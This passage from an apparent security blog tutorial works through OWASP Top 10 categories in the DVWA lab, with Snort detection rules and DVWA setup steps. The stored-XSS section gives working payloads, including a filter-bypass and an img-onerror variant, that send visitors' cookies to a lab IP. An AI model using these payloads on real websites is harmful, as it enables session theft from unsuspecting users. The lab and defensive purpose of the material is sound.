When this vulnerability is exploited, the script will persist on the web server and run whenever other victims visit the affected website.<\/p>\n\n\n\n<p>This section in DVWA is just a guestbook that asks visitors to enter their name and a message. The goal is to redirect victims to another webpage. I only used alerts on this one, but you can use the scripts from the other XSS attacks to redirect to a different page.<\/p>\n\n\n\n<p>Inside DVWA Low, the input will not be validated.<\/p>\n\n\n\n<p>In the message box, you can put the script below. You can place anything in the name field.<\/p>\n\n\n\n<p>&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>For Medium difficulty, the source code tried to add protection for the message field.<\/p>\n\n\n\n<p>Inspect the page, and change the name input size from 10 to 100.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"667\" height=\"482\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedStoredScript.png\" alt=\"\" class=\"wp-image-965\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedStoredScript.png 667w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedStoredScript-300x217.png 300w\" sizes=\"(max-width: 667px) 100vw, 667px\" \/><\/figure>\n\n\n\n<p>This will allow you to put the code in the name field. 
It won&#8217;t work if you attempt to run it in the message field.<\/p>\n\n\n\n<p>&lt;sc&lt;script&gt;ript&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<p>You can also try:<\/p>\n\n\n\n<p>&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"446\" height=\"242\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medstoredalt.png\" alt=\"\" class=\"wp-image-966\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medstoredalt.png 446w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medstoredalt-300x163.png 300w\" sizes=\"(max-width: 446px) 100vw, 446px\" \/><\/figure>\n\n\n\n<p>For the high difficulty, the source code adds protection to both fields.<\/p>\n\n\n\n<p>We can use HTML events. Put the code in the name field, and you can put a random message.<\/p>\n\n\n\n<p>Inspect the page, and change the name input size from 10 to 100. Use the script below.<\/p>\n\n\n\n<p>&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<p>The impossible mode uses &#8220;htmlspecialchars()&#8221; to help prevent XSS attacks.<\/p>\n\n\n\n<p id=\"SnortStored\"><strong>Snort rule to detect Stored XSS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># This rule fires the very first time the stored XSS is submitted. It will not fire when later visitors load the page and are affected,\n# because the stored script then arrives in the server response, which this rule (traffic towards port 80) does not inspect.\n# The guestbook posts its fields as txtName and mtxMessage in the request body, so the pcre anchors on those names rather than on id=.\n# Without the U flag the pcre inspects the whole request, including the POST body. The \/i flag already makes it case-insensitive.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"XSS Stored Injection detected - \/vulnerabilities\/xss_s\";\\\nsid: 1000032;\\\nrev: 1;\\\nuricontent: \"\/vulnerabilities\/xss_s\/\"; nocase;\\\npcre:\"\/(^|&amp;)?(?:txtName|mtxMessage)=&#91;^&amp;]*?(%22|%26|%27|%28|%29|%2D|%2E|%2F|%3B|%3C|%3D|%3E|%5C|%60|%7C|\\b(?:EVAL|UNESCAPE|ATOB|IMG|SRC|ALERT|VALUE|DOCUMENT.COOKIE|DOCUMENT.LOCATION|DOCUMENT|&amp;LT|&amp;GT|&amp;AMP|&amp;QUOT|PROMPT|CONFIRM|ONLOAD|ONMOUSEOVER|ONERROR|ONBLUR|ONFOCUS|ONMOUSEDOWN|HREF|BACKGROUND|SCRIPT)\\b|--)\/im\";\\\n)<\/code><\/pre>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"InsecureDesign\">4. Insecure Design<\/h3>\n\n\n\n<p>This category can be confusing, but it means there should be more thinking during the design phase: using things like a secure development lifecycle, continuous threat modeling, and following security principles.<\/p>\n\n\n\n<p>Insecure design is a lack of foresight into which threats or vulnerabilities may arise once something is launched. An example is when the HTTP protocol was created. Security was not a concern, as it was used on private academic, research, and government networks. But as the internet grew and went public, the lack of encryption quickly became a security flaw.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SecMisConf\">5. Security Misconfiguration<\/h3>\n\n\n\n<p>Now, for this section, I usually have three big things come to mind, though there are 20 CWEs mapped to it.<\/p>\n\n\n\n<p>The first is debloating your workstation or server. This means removing anything unnecessary from the system. 
This will help reduce the attack surface of that device, giving the attacker fewer opportunities to exploit it.<\/p>\n\n\n\n<p>This is not just applications and services; it also covers ports, accounts, and privileges. If you are running a web server, you must review plugins and any additional directories\/pages that may exist by default. The last thing you\u2019ll want is a compromise via an XSS through an old chat room plugin built into your web server folders.<\/p>\n\n\n\n<p>The second is system hardening. Most systems\/servers do not come pre-hardened, and organizations need to harden them to maintain compliance with regulations and industry standards. Most organizations already have this automated, but a good resource for hardening is the Center for Internet Security (CIS) Benchmarks.<\/p>\n\n\n\n<p>CIS creates benchmarks, which are comprehensive manuals that help people and organizations secure and harden their systems. They cover Linux servers, workstations, Windows servers, cloud instances, and many more. They\u2019re extremely comprehensive and can reach the thousand-page mark.<\/p>\n\n\n\n<p>The third one is showing too much information. An example is when you try to access a specific page on my web server that doesn\u2019t exist, and the 404 error page appears, revealing the exact version and type of server running. This helps the attacker narrow down their search for exploits specific to that version.<\/p>\n\n\n\n<p>This can be mitigated by simply removing the server details from the error message or serving a different 404 page\/message.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"vulnComp\">6. Using Vulnerable and Outdated Components<\/h3>\n\n\n\n<p>Legacy servers and applications are (sadly) common in most companies. These are usually critical systems that have not been upgraded or migrated to secure, maintained versions. 
Reasons can include complexity, specific applications not being supported in upgrades, cost, or all of the above.<\/p>\n\n\n\n<p>For these types of systems, you have to make sure they are hardened, debloated, monitored, and, if possible, scanned for vulnerabilities occasionally and patched. Sometimes, scanning may not be an option, as it can bring the system down. They will also have to be placed on their own VLAN.<\/p>\n\n\n\n<p>It is important to follow these security measures, as it is extremely easy for someone to exploit these systems, given that exploits for them are readily and publicly available in exploit databases.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"IAM\">7. Identification and Authentication Failures<\/h3>\n\n\n\n<p>This section is very heavy on password attacks. What sticks out here is making sure that the appropriate policies are in place to counter password attacks, such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Password length and complexity requirements<\/li>\n\n\n\n<li>Limits on password attempts<\/li>\n\n\n\n<li>No knowledge-based security questions<\/li>\n\n\n\n<li>Multifactor authentication enabled (a common failure is not having it enabled)<\/li>\n<\/ul>\n\n\n\n<p>Some other things to look out for are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Use of default credentials<\/li>\n\n\n\n<li>Reused or non-expiring tokens<\/li>\n<\/ul>\n<\/div>\n\n\n\n<p>DVWA also has a brute force section. 
I created the rule below as a small bonus to help Snort detect brute-force attacks.<\/p>\n\n\n\n<div class=\"wp-block-group is-layout-constrained wp-block-group-is-layout-constrained\">\n<p id=\"SnortBrute\"><strong>Brute Force detection Snort rule<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Can be further enhanced by adding content: \"POST\"; http_method; so that only login submissions are counted,\n# by tuning the flow option or adding flowbits, and by using a more specific uricontent.\n# Snort option keywords are lowercase, and the uricontent value must use straight quotes.\n# detection_filter raises the alert once the same source exceeds 5 matching requests within 60 seconds.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"Potential Brute Force Attack\";\\\nsid: 1000022;\\\nrev: 1;\\\nflow: established,from_client;\\\nuricontent: \"\/vulnerabilities\/brute\";\\\ndetection_filter: track by_src, count 5, seconds 60;\\\n)<\/code><\/pre>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SoftData\">8. Software and Data Integrity Failures<\/h3>\n\n\n\n<p>When it comes to this category, I immediately think of the hashes shown to you on a tool&#8217;s download screen.<\/p>\n\n\n\n<p>You are supposed to get the hash of the tool\/software\/update AFTER you download it and compare it to the hash shown on the site. They are supposed to match, and if they do not, it is a strong indicator that the software\/tool has been tampered with.<\/p>\n\n\n\n<p>An example of failure in this category is not having a hash AT ALL or any other way to check the integrity of what you are bringing into your environment.<\/p>\n\n\n\n<p>Here is an example of there being a hash when downloading a tool. 
I can use Pestudio, a tool I currently use for malware analysis.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"689\" height=\"503\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudioPic.png\" alt=\"\" class=\"wp-image-843\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudioPic.png 689w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudioPic-300x219.png 300w\" sizes=\"(max-width: 689px) 100vw, 689px\" \/><\/figure>\n\n\n\n<p>As I mentioned before, they give you a hash to compare against.<\/p>\n\n\n\n<p>Running \u201cGet-FileHash \u2026\u201d on the file path in PowerShell can give you the hash, as shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"712\" height=\"296\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudiohash.png\" alt=\"\" class=\"wp-image-844\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudiohash.png 712w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudiohash-300x125.png 300w\" sizes=\"(max-width: 712px) 100vw, 712px\" \/><\/figure>\n\n\n\n<p>The hash we get in PowerShell seems to match the hash on the website, indicating that the zip file has not been tampered with.<\/p>\n\n\n\n<p>What about the stuff that is already running on our systems? We can verify the signatures of running applications\/processes. I know how to do this using a Sysinternals tool called Process Explorer. Inside Process Explorer, right-click on any process you want to verify, click on properties, and then click on the image tab. 
Here, there is a Verify button to check whether the signature is legitimate.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"568\" height=\"639\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/verifySig.png\" alt=\"\" class=\"wp-image-845\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/verifySig.png 568w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/verifySig-267x300.png 267w\" sizes=\"(max-width: 568px) 100vw, 568px\" \/><\/figure>\n\n\n\n<p>On Linux, you will also want to make sure you are using safe and trusted repositories. There will be times when you can check hashes, and most Linux repos use PGP keys to sign their packages.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SecLog\">9. Security Logging and Monitoring Failures<\/h3>\n\n\n\n<p>Failure in this category can occur simply by not logging the basics (failed and successful logins, high network activity, errors, web attacks and recon, etc.). Make sure your systems and their applications\/services are logging and forwarding to a SIEM. Do not rely on logs stored locally, and continuously revise your detection\/alerting rules.<\/p>\n\n\n\n<p>A big one I see is not keeping all your logs in a consistent format. Logs can also contain too little information, or too much information that could help an attacker. Make sure the logs and the archive folders for older logs follow a consistent format, and that the folders have unique names so they do not overwrite each other.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SSRF\">10. 
SSRF<\/h3>\n\n\n\n<p>The final category takes us back to the first one. An example of Server-Side Request Forgery has already been shown.<\/p>\n\n\n\n<p class=\"has-zeever-bgsoft-background-color has-background\">Specifically, the Remote File Inclusion example.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"603\" height=\"35\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-1.png\" alt=\"\" class=\"wp-image-846\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-1.png 603w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-1-300x17.png 300w\" sizes=\"(max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<p>The main things that I see that make up a server-side request forgery are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>An attacker is attempting to target a server that they do not have direct access to<\/strong>\n<ul class=\"wp-block-list\">\n<li>This can be because a whitelist, firewalls, or other ACLs limit access to that server<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>There is a vulnerable web server between the attacker&#8217;s machine and the target server<\/strong>\n<ul class=\"wp-block-list\">\n<li>This server is whitelisted to communicate with the target server<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>The attacker will use specifically crafted URLs like the one shown above<\/strong>\n<ul class=\"wp-block-list\">\n<li>It will seem as if the vulnerable server itself is attempting to access internal and external machines.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p>Now, the URL shown in that image is just the same web server fetching a file from itself via a different port. 
But the address can be either an internal or an external one.<\/p>\n\n\n\n<p><strong>Mitigations<\/strong><\/p>\n\n\n\n<p>Defense in depth:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Application\n<ul class=\"wp-block-list\">\n<li>Disable URL schemes such as file:\/\/, ftp:\/\/, and other dangerous schemes; only allow HTTP and HTTPS<\/li>\n\n\n\n<li>Validate user input<\/li>\n\n\n\n<li>Make sure the request is going to a public IP address, not an internal one.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Network\n<ul class=\"wp-block-list\">\n<li>Segment public-facing servers<\/li>\n\n\n\n<li>Ensure firewall policies are \u201cdeny by default\u201d and allow only the necessary internal traffic<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html\">https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-22177b6a wp-block-group-is-layout-constrained\" style=\"padding-top:100px;padding-bottom:100px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" id=\"DVWA\">\n<h2 class=\"wp-block-heading has-text-align-left is-style-lineseparator zeever-animate zeever-move-right zeever-delay-1 has-zeever-primary-color has-text-color has-heading-2-font-size\">Setting up 
DVWA<\/h2>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-left zeever-animate zeever-move-right zeever-delay-3 has-zeever-secondary-color has-text-color has-tiny-font-size\" style=\"font-style:normal;font-weight:500;text-transform:uppercase\">How to quickly set up DVWA<\/h2>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n\n\n\n<p>Download the Ubuntu ISO from this link.<\/p>\n\n\n\n<p><a href=\"https:\/\/ubuntu.com\/download\/desktop\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/ubuntu.com\/download\/desktop<\/a><\/p>\n\n\n\n<p>You&#8217;ll have to click the green button and wait a bit for the download.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"697\" height=\"272\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/UbuntuDown.png\" alt=\"\" class=\"wp-image-1006\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/UbuntuDown.png 697w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/UbuntuDown-300x117.png 300w\" sizes=\"(max-width: 697px) 100vw, 697px\" \/><\/figure>\n\n\n\n<p>After getting the ISO, open VirtualBox and click Machine \u2192 New.<\/p>\n\n\n\n<p>Put any name; it can be DVWA Ubuntu.<\/p>\n\n\n\n<p>Make sure the ISO image is the one you just downloaded. You can click on the checkbox for \u201cSkip Unattended Installation\u201d. Click Next.<\/p>\n\n\n\n<p>For the hardware screen, it depends on your hardware. You can leave it at the default, or bump the memory up to double. Here I have 4 CPU processors. 
You can leave it at 1 or 2.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"569\" height=\"265\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/Hardware.png\" alt=\"\" class=\"wp-image-1007\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/Hardware.png 569w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/Hardware-300x140.png 300w\" sizes=\"(max-width: 569px) 100vw, 569px\" \/><\/figure>\n\n\n\n<p>I just left the Virtual Hard Disk at the default. 25GB is enough.<\/p>\n\n\n\n<p>Then click Finish on the summary screen. After that, you can start the VM.<\/p>\n\n\n\n<p>When asked for the preferred language, move to it with your arrow keys, then press Enter. For me, it\u2019s \u201cEnglish\u201d. Click on \u201cInstall Ubuntu\u201d. Make sure you select your keyboard layout. I chose the minimal installation. Click \u201cContinue.\u201d<\/p>\n\n\n\n<p>In the installation type window, click &#8220;Install Now.&#8221;<\/p>\n\n\n\n<p>Fill out the name, computer name, and password fields, then move on when done. Copying the files may take a couple of minutes. 
Once it finishes, click on the restart button.<\/p>\n\n\n\n<p>Just wait for it to load back up, and press Enter if it says to \u201cremove the media and hit enter.\u201d<\/p>\n\n\n\n<p>Then log in after that little reset.<\/p>\n\n\n\n<p>You can skip the pop-up window that asks whether you want to connect your online account and help improve Ubuntu.<\/p>\n\n\n\n<p>Open Firefox and search for DVWA.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"722\" height=\"427\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWASearch.png\" alt=\"\" class=\"wp-image-1008\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWASearch.png 722w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWASearch-300x177.png 300w\" sizes=\"(max-width: 722px) 100vw, 722px\" \/><\/figure>\n\n\n\n<p>Click on the first GitHub link as shown above. Once inside, click \u201cCode,\u201d then click the little copy button as shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"729\" height=\"427\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAURL.png\" alt=\"\" class=\"wp-image-1010\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAURL.png 729w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAURL-300x176.png 300w\" sizes=\"(max-width: 729px) 100vw, 729px\" \/><\/figure>\n\n\n\n<p>Open the terminal and make sure you have Git installed.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"509\" height=\"74\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptGit.png\" alt=\"\" class=\"wp-image-1009\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptGit.png 509w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptGit-300x44.png 300w\" sizes=\"(max-width: 509px) 100vw, 509px\" 
\/><\/figure>\n\n\n\n<p>After that, clone the repo.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"752\" height=\"99\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAClone.png\" alt=\"\" class=\"wp-image-1011\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAClone.png 752w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAClone-300x39.png 300w\" sizes=\"(max-width: 752px) 100vw, 752px\" \/><\/figure>\n\n\n\n<p>Apt install the MariaDB server.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"673\" height=\"93\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MariaDBInstall.png\" alt=\"\" class=\"wp-image-1012\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MariaDBInstall.png 673w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MariaDBInstall-300x41.png 300w\" sizes=\"(max-width: 673px) 100vw, 673px\" \/><\/figure>\n\n\n\n<p>Apt install the MariaDB client.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"656\" height=\"73\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptmariadbclient.png\" alt=\"\" class=\"wp-image-1013\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptmariadbclient.png 656w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptmariadbclient-300x33.png 300w\" sizes=\"(max-width: 656px) 100vw, 656px\" \/><\/figure>\n\n\n\n<p>Apt install Apache2.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"548\" height=\"75\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/apache2Install.png\" alt=\"\" class=\"wp-image-1014\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/apache2Install.png 548w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/apache2Install-300x41.png 300w\" 
sizes=\"(max-width: 548px) 100vw, 548px\" \/><\/figure>\n\n\n\n<p>Apt install libapache2<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"694\" height=\"39\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptlibApache.png\" alt=\"\" class=\"wp-image-1015\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptlibApache.png 694w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptlibApache-300x17.png 300w\" sizes=\"(max-width: 694px) 100vw, 694px\" \/><\/figure>\n\n\n\n<p>Install PHP-MySQL<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"631\" height=\"101\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallPhpMysql.png\" alt=\"\" class=\"wp-image-1016\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallPhpMysql.png 631w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallPhpMysql-300x48.png 300w\" sizes=\"(max-width: 631px) 100vw, 631px\" \/><\/figure>\n\n\n\n<p>Install PHP-gd<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"594\" height=\"64\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallphpgd.png\" alt=\"\" class=\"wp-image-1017\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallphpgd.png 594w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallphpgd-300x32.png 300w\" sizes=\"(max-width: 594px) 100vw, 594px\" \/><\/figure>\n\n\n\n<p>After installing all of that, move DVWA into \/var\/www\/html<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"395\" height=\"37\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MvDVWA.png\" alt=\"\" class=\"wp-image-1018\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MvDVWA.png 395w, 
https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MvDVWA-300x28.png 300w\" sizes=\"(max-width: 395px) 100vw, 395px\" \/><\/figure>\n\n\n\n<p>Note: You\u2019ll have to use sudo or switch to root.<\/p>\n\n\n\n<p>cd into the DVWA folder and run the command below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"575\" height=\"26\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/cpconfDist.png\" alt=\"\" class=\"wp-image-1019\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/cpconfDist.png 575w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/cpconfDist-300x14.png 300w\" sizes=\"(max-width: 575px) 100vw, 575px\" \/><\/figure>\n\n\n\n<p>Use the command \u201csudo mysql\u201d.<\/p>\n\n\n\n<p>Run the 4 commands shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"706\" height=\"400\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/databaseCommands-1.png\" alt=\"\" class=\"wp-image-1028\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/databaseCommands-1.png 706w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/databaseCommands-1-300x170.png 300w\" sizes=\"(max-width: 706px) 100vw, 706px\" \/><\/figure>\n\n\n\n<p>You can test logging into the database as the user \u201cdvwa\u201d with the password \u201cp@ssw0rd\u201d in a new terminal window. You can run the command below to place the password on the terminal. 
Or run it with just -p, so the password is hidden.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"276\" height=\"62\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/dvwaUserPass.png\" alt=\"\" class=\"wp-image-1021\"\/><\/figure>\n\n\n\n<p>Do a quick restart of the services.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"611\" height=\"52\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/serviceRestart.png\" alt=\"\" class=\"wp-image-1022\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/serviceRestart.png 611w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/serviceRestart-300x26.png 300w\" sizes=\"(max-width: 611px) 100vw, 611px\" \/><\/figure>\n\n\n\n<p>Then navigate to \u201clocalhost\/DVWA\/setup.php\u201d on Firefox, and you\u2019ll be greeted with the setup page.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"831\" height=\"667\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage.png\" alt=\"\" class=\"wp-image-1023\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage.png 831w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage-300x241.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage-768x616.png 768w\" sizes=\"(max-width: 831px) 100vw, 831px\" \/><\/figure>\n\n\n\n<p>Scroll to the bottom and click the \u201cCreate \/ Reset Database\u201d button. 
